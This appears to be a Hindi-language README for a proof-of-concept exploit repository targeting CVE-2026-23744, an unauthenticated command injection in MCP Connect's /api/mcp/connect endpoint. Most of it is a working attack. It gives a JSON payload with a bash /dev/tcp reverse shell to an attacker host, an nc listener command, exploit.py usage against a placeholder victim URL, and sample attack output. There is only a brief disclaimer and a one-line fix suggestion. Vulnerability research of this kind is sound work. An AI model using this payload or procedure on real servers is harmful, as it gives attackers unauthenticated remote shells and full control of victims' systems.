
CVE-2026-23744 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो MCP Connect में एक अनप्रमाणित कमांड इंजेक्शन है, जिससे रिमोट कोड निष्पादन और रिवर्स शेल प्राप्त होता है।
⚠️ अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। बिना स्पष्ट प्राधिकरण के सिस्टम के विरुद्ध इस एक्सप्लॉइट का उपयोग अवैध है। लेखक इस कोड के दुरुपयोग के लिए जिम्मेदार नहीं है।
यह भेद्यता /api/mcp/connect एंडपॉइंट में मौजूद है, जो एक अनधिकृत हमलावर को दुर्भावनापूर्ण कॉन्फ़िगरेशन के साथ एक मनमाना MCP (Model Context Protocol) सर्वर पंजीकृत करने की अनुमति देता है। command फ़ील्ड और उसके args पर कोई सत्यापन या सैनिटाइज़ेशन न होने के कारण, ऑपरेटिंग सिस्टम कमांड इंजेक्ट करना संभव है जो वेब प्रक्रिया के विशेषाधिकारों के साथ सीधे सर्वर पर निष्पादित होते हैं।
इसके परिणामस्वरूप रिमोट कोड निष्पादन (RCE) होता है जिसका उपयोग समझौता किए गए सिस्टम पर रिवर्स शेल प्राप्त करने के लिए किया जा सकता है।
| फ़ील्ड | विवरण |
|---|---|
| प्रकार | Remote Code Execution (RCE) |
| वेक्टर | नेटवर्क (बिना प्रमाणीकरण के HTTP POST) |
| एंडपॉइंट | /api/mcp/connect |
| गंभीरता | 🔴 क्रिटिकल |
| प्रमाणीकरण | आवश्यक नहीं |
| प्रभाव | सर्वर पर पूर्ण नियंत्रण |
{
"serverId": "shell1",
"serverConfig": {
"command": "bash",
"args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
"env": {}
}
}
सर्वर इस कॉन्फ़िगरेशन को संसाधित करता है और प्रदान किए गए तर्कों के साथ bash कमांड को लागू करता है, जिससे हमलावर की ओर एक रिवर्स TCP कनेक्शन स्थापित होता है।
pip install requests termcolor
python3 exploit.py -l <TU_IP> -u <URL_OBJETIVO>
| पैरामीटर | विवरण | उदाहरण |
|---|---|---|
-l | आपका IP (जहाँ आप शेल प्राप्त करेंगे) | 192.168.1.50 |
-u | लक्ष्य का आधार URL | https://victim.com |
टर्मिनल 1 — लिसनर:
nc -nlvp 443
टर्मिनल 2 — एक्सप्लॉइट:
python3 exploit.py -l 192.168.1.50 -u https://victim.com
[-] Please, execute the following command in another terminal:
[+] nc -nlvp 443
[-] Press 'Enter' when the command has been executed...
[+] Sending attack request...
एक बार अनुरोध भेजे जाने के बाद, पोर्ट 443 पर लिसनर समझौता किए गए सर्वर की इंटरैक्टिव शेल के साथ रिवर्स कनेक्शन प्राप्त करेगा।
/api/mcp/connect में बॉडी के सभी फ़ील्ड को संसाधित करने से पहले सत्यापित और सैनिटाइज़ करें।.
├── exploit.py # एक्सप्लॉइट का मुख्य स्क्रिप्ट
└── README.md # यह फ़ाइल
आक्रामक सुरक्षा अनुसंधान उद्देश्यों के लिए Jorge Arana Fedriani द्वारा विकसित।